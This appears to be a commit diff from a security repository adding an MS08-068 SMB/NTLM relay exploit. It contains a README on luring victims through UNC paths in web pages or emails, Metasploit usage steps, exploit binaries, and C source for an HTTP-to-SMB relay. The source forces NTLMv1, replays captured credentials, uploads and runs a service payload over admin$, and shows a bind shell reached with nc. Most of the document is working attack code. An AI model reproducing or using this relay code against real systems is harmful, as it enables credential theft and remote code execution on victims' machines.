SecWiki
diff --git a/‎MS08-068/Disable_Port_445.reg
+4 b/‎MS08-068/Disable_Port_445.reg
+4
diff --git a/‎MS08-068/Enable_Port_445.reg
+4 b/‎MS08-068/Enable_Port_445.reg
+4
diff --git a/‎MS08-068/README.md
+34 b/‎MS08-068/README.md
+34
diff --git a/‎MS08-068/libeay32.dll
832 KB b/‎MS08-068/libeay32.dll
832 KB
diff --git a/‎MS08-068/smbrelay3.exe
268 KB b/‎MS08-068/smbrelay3.exe
268 KB
diff --git a/‎MS08-068/smrs.exe
2 KB b/‎MS08-068/smrs.exe
2 KB
diff --git a/‎MS08-068/src/httprelay.cpp
+350 b/‎MS08-068/src/httprelay.cpp
+350
@@ -0,0 +1,4 @@
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
+"TransportBindName"=""
@@ -0,0 +1,4 @@
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
+"TransportBindName"="\\Device\\"
@@ -0,0 +1,34 @@
+# MS08-068
+
+```
+This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. 
+To exploit this, the target system	must try to	authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. 
+When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. 
+Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. 
+The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. 
+The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia. On November 11th 2008 Microsoft released bulletin MS08-068. 
+This bulletin includes a patch which prevents the relaying of challenge keys back to the host which issued them, preventing this exploit from working in the default configuration. 
+It is still possible to set the SMBHOST parameter to a third-party host that the victim is authorized to access, but the "reflection" attack has been effectively broken.
+```
+  
+- The exp is from [exp-db](https://www.exploit-db.com/exploits/20/)
+Vulnerability reference:
+ * [MS08-068](https://technet.microsoft.com/zh-cn/zh/library/security/ms08-068)
+ * [CVE-2008-4037](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4037)
+
+
+## load the module within the Metasploit console
+```
+msf > use exploit/windows/smb/smb_relay
+msf exploit(smb_relay) > show targets
+    ...targets...
+msf exploit(smb_relay) > set TARGET <target-id>
+msf exploit(smb_relay) > show options
+    ...show and set options...
+msf exploit(smb_relay) > exploit
+    
+```
+
+
+
+
@@ -0,0 +1,350 @@
+/*
+    SMBRelay3 - HTTP REPLAY ATTACK MODULE
+    -------------------------------------
+
+
+C:\smbrelay>smbrelay3.exe --ListForHTTPRequests
+[+] Accepted Connection - Replaying against 192.168.47.128
+[+] Reading Initial HTTP Request...
+[+] Sending Default HTTP 401 Error response and asking for authentiation NTLM
+[+] Reading Second HTTP Request with Auhorization Header..
+GET /test HTTP/1.1
+[+] Authorization header received.
+[+] Init HTTP to SMB attack - Connecting with: 192.168.47.128:445
+Received SMB Message with NTLM v2 packet
+Sending NTLM Challenge from SMB Server to the HTTP Client
+Sending HTTP Response: HTTP/1.1 401 Access Denied
+Received Final Authentication packet from remote HTTP Client
+Trying to authenticate to remote SMB as Administrador
+Sending Final SMB Authentication packet with NTLM Message type 3
+SessionSetupAndX Completed. Authenticacion against 192.168.47.128 Succeed as Administrador
+[+] Connecting against \\192.168.47.128\ipc$
+[+] Trying to connect to admin$
+[+] Creating Remote File smrs.exe under admin$
+[+] Writing File smrs.exe into admin$ (2048 bytes)
+[+] Opening Remote Service Control Manager pipe \svcctl
+[*] Sending RPC BindRequest to SCM pipe
+[*] Reading Response from Binding Request
+[+] Opening Remote Service Control Manager (Creating Service)
+[+] Creating Remote Service
+[+] Opening Remote Service
+[+] Starting Remote Service...
+[+] *** Remote SmbRelay3 BindShell Service Running ***: (192.168.47.128:8080)
+
+
+C:\smbrelay>nc 192.168.47.128 8080
+Microsoft Windows 2000 [Versión 5.00.2195]
+(C) Copyright 1985-2000 Microsoft Corp.
+
+C:\WINNT\system32>
+
+*/
+
+#include "httprelay.h"
+#include "payload.h"
+
+extern int verbose;
+extern int ProxySMB;
+
+int HandleIncommingHTTPRequest(RELAY *relay, char *destinationhostname,int destinationport)
+{
+	char request[4096];
+	int leido=0;
+	int total=0;
+	char **header;
+	unsigned int nheaders=0;
+	char *data;
+    char *p;
+	int i;
+	char buf[4096];
+	char buf1[4096];
+	char buf2[4096];
+	uint16 packetlen;
+	smheader *SmbPacket1, *SmbPacket2, *SmbPacket3;
+	smheader *NegotiateProtocol;
+	char CurrentUserName[256];
+	char CurrentDomain[256];
+	char CurrentWorkstation[256];
+	const uint8 SpoofedChallengeKey[]="\x11\x22\x33\x44\x55\x66\x77\x88";
+
+
+
+	char InitialResponse[]=	"HTTP/1.1 401 Unauthorized\r\n"
+							"Content-Length: 0\r\n"
+							"Content-Type: text/html\r\n"
+							"Server: Microsoft-IIS/6.0\r\n"
+							"WWW-Authenticate: NTLM\r\n"
+							"Connection: keep-alive\r\n\r\n";
+	char owned[4096]="<html><title>smbrelay owning</title><body><h1>You have been owned by Smbrelay3</body></html>";
+
+	memset(request,'\0',sizeof(request));
+	total=ReadRequest(relay,(char*)&request,sizeof(request));
+	if (total<=0) return(1);    
+	printf("[+] Reading Initial HTTP Request...\r");
+    CleanLine(verbose);
+	if (verbose){
+        printf("\n");
+        if (debug) {
+		    printf("\n%s\n",request);
+        }
+	}
+	do {
+
+	    printf("[+] Sending Default HTTP 401 Error response and asking for authentiation NTLM\r");
+        CleanLine(verbose);
+	    send(relay->source,InitialResponse,(int)strlen(InitialResponse),0);
+
+	    memset(request,'\0',sizeof(request));
+	    total=ReadRequest(relay,(char*)&request,sizeof(request));
+	    if (total<=0) return(1);
+        CleanLine(verbose);
+	    printf("[+] Reading Second HTTP Request with Auhorization Header..\r");
+	    header=ParseHeaders(request,&nheaders);
+	    data=GetHeaderValue(header, nheaders, "Authorization: NTLM ") ;
+	    if (!data) {
+            if (verbose) printf("\n");
+            if (debug) {
+                CleanLine(verbose);
+		        printf("[+]  Ooops! Authorization header missing\n");
+                printf("%s\n",request);
+		        return(0);
+            }           
+        } else {
+            if (verbose) printf("\n%s\n",request);    
+        }
+    } while (!data);
+
+	if (verbose) {
+        CleanLine(verbose);
+		printf("[+] Authorization header received.\n");
+        if (debug) {
+            printf("%s\n",data);
+        }
+	}
+
+	if (!ProxySMB)
+	{
+        CleanLine(verbose);
+	    printf("[+] Init HTTP to SMB attack - Connecting with: %s:%i\r",destinationhostname,destinationport);        
+	    i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
+	    if (!i) {
+            CleanLine(verbose);
+		    printf("[-] Unable to connect to remote host %s:%i\r",destinationhostname,destinationport);
+		    return(0);
+	    }
+        if (verbose) printf("\n");
+	    printf("Sending SMB Authentication Handshake                                              \r");
+        p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
+        p = AddDialect(p,"LANMAN1.0", 0x02,&i);
+        p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
+        p = AddDialect(p,"LM1.2X002", 0x02,&i);
+        p = AddDialect(p,"LANMAN2.1", 0x02,&i);
+        p = AddDialect(p,"NT LM 0.12", 0x02,&i);
+	    NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
+        free(p);
+        i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
+        free(NegotiateProtocol);
+
+	    if (i<=0){
+		    printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed                                \n");
+            return(0);
+
+	    }
+	    memset(buf,'\0',sizeof(buf));
+
+	    SmbPacket1=BuildSmbPacket1();
+	    if (debug)  {
+		    printf("\n[*]Dumping SMB Packet With NTLM Message Type 1                                  \n");
+		    DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
+	    }
+
+	    SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
+	    if  (SmbPacket2==NULL) {
+		    printf("Unable to receive SMB Packet with NTLM Message Type 2                  \n");
+            return(0);
+	    }
+	    printf("Received SMB Message with NTLM v2 packet\n");
+	    memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);
+	    
+        if (debug) {
+		    printf("SMB Packet Dump:\n");
+		    DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
+		    printf("NTLM Challenge packet from SMB message\n");
+		    DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
+		    
+		    
+	    }
+        if (verbose)
+	    {
+            printf("[+] Debug Information                                                             \n");
+            dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
+        }
+        //HACK: Force NTLMv1 
+        ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0x0000b207;
+        //((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xA0003287;
+	    to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);    
+	} else {
+        //TODO: Generar paquete Auth Challenge
+		//BuildAuthChallenge((tSmbNtlmAuthChallenge *)buf, "SMBRELAY3","SERVERNAME", "SERVER","SERVER",0,(uint8*)&SpoofedChallengeKey);
+		//to64frombits((unsigned char*)&buf1, (unsigned char*)buf,NtlmChallengeSize((tSmbNtlmAuthChallenge *)buf));
+	}
+
+	
+	
+	sprintf(buf,"HTTP/1.1 401 Access Denied\r\nServer: Microsoft-IIS/6.0\r\nWWW-Authenticate: NTLM %s\r\nContent-Length: 0\r\nContent-Type: text/html\r\n\r\n",buf1);
+
+	printf("Sending NTLM Challenge from SMB Server to the HTTP Client\n");
+	if (verbose)
+	{
+		printf("Sending HTTP Response: %s\n",buf);
+	}
+	send(relay->source,buf,(int)strlen(buf),0);
+	
+	total=ReadRequest(relay,(char*)&request,sizeof(request));
+	if (total<=0) {
+		printf("Error reading Final Authentication packet from HTTP Client\n");
+		return(1);
+	}
+	printf("Received Final Authentication packet from remote HTTP Client\n");
+	if(verbose)
+	{
+		printf("%s\n",request);
+	}
+	header=ParseHeaders(request,&nheaders);
+	data=GetHeaderValue(header, nheaders, "Authorization: NTLM ") ;
+	if (!data) {
+		printf("Ooops! Authorization header missing\n");
+		return(0);
+	}
+
+//	printf("lenght del hash3 ntlm: %i\n",strlen(data));
+	memset((char*)&buf1,'\0',sizeof(buf1));
+	packetlen=from64tobits(buf1, data);
+	if (verbose) {
+        if (debug) 
+        {
+		    printf("Raw authorization packet (len: %i)\n",packetlen);
+		    DumpMem(buf1,packetlen+10);
+        }
+		dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);
+	}
+    if  ( ((tSmbNtlmAuthResponse*)buf1)->ntResponse.len != 24 )
+    {
+        printf("[-] Remote HTTP Client forced NTLMv2 Authentication\n");
+        strcpy(request,"HTTP/1.1 401 Unauthorized\r\nContent-Length: 0\r\nConnection: close\r\n\r\n");
+		send(relay->source,request,(int)strlen(request),0);
+        return(0);
+    }
+
+
+	GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
+	printf("Trying to authenticate to remote SMB as %s\n",CurrentUserName);
+//A1
+	//DumpMem(buf1,packetlen);
+	
+	buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
+	
+	
+    SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
+
+	printf("Sending Final SMB Authentication packet with NTLM Message type 3                    \r");
+    if (verbose) printf("\n");
+	if (debug) 
+	{
+		DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
+	}
+
+    i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
+	if (i<=0){
+		printf("[-] Error reading Server Authentication Response                         \n");
+        return(0);
+
+	}
+	if (debug)  {
+		printf("[-] SessionSetupAndX Completed - Dumping received packet                            \n");
+		DumpMem(buf,i);
+	}
+
+	if (((smheader*)buf)->NtStatus!=0x00000000) {
+		strcpy(request,"HTTP/1.1 401 Unauthorized\r\nContent-Length: 0\r\nConnection: close\r\n\r\n");
+		send(relay->source,request,(int)strlen(request),0);
+		printf("[-] SessionSetupAndX Completed. Authentication Failed                                \n");
+		return(0);
+	}
+		
+	//WriteDataToReportFile("log.txt", (tSmbNtlmAuthResponse*)buf1, destinationhostname,(unsigned char*)((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->challengeData);
+	
+	printf("SessionSetupAndX Completed. Authenticacion against %s Succeed as %s\r",destinationhostname,CurrentUserName);
+    if (verbose) 
+	{
+		printf("\n");
+		sprintf(owned,"<html><title>smbrelay III</title><body><h1>Dear %s\\%s<br></h1> Your credentials were replayed against %s and code execution succeed</body></html>",CurrentWorkstation,CurrentUserName,destinationhostname);
+	//GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
+	}
+
+	sprintf(request,"HTTP/1.1 200 OK\r\nContent-Length: %i\r\nConnection: close\r\n\r\n%s",strlen(owned),owned);
+	send(relay->source,request,(int)strlen(request),0);
+	ExecuteCode( *relay);
+    return(1);
+
+}
+int ReadRequest(RELAY *relay, char *request, int requestsize)
+{
+	int leido=0;
+	int total=0;
+	int EndOfRequest=0;
+	do 
+	{
+		leido=recv( relay->source,request+total,requestsize-total,0 );
+		total+=leido;
+		EndOfRequest=(strcmp(request+total-4,"\r\n\r\n")==0);
+	} while ( (!EndOfRequest) && (leido>0) );
+	return(total);
+
+}
+/******************************/
+char **ParseHeaders(char *lpBuffer, unsigned int *nheaders)
+{
+      char *next;
+      char *current=lpBuffer;
+	  char **header;
+	  
+	  header=NULL;
+      *nheaders=0;
+
+	if ( (!lpBuffer) ||(*lpBuffer=='\0') )
+	{
+		*nheaders=0;
+		return(NULL);
+	}
+    do {
+		
+		next=strchr(current,'\n');
+        header=(char **)realloc(header,sizeof(char*)*(*nheaders+1));
+        if (next) {            
+            next[0]='\0';
+			if (*(next-1)=='\r') *(next-1)='\0';
+         }
+         header[*nheaders]=current;
+		 *nheaders=*nheaders+1;
+         if (!next) break;
+         current=next+1;
+	} while ((*current!='\r') && (*current!='\n') );
+	return(header);
+}
+/******************************/
+char *GetHeaderValue(char **header, int nheaders, char *Header) 
+{	
+	
+	
+   for(unsigned int i=1;i<(unsigned int)nheaders;i++)
+   {
+      if (_strnicmp(header[i],Header,strlen(Header))==0)
+     {
+		return(header[i] + strlen(Header));
+      }
+   }
+   return(NULL);
+   
+}
+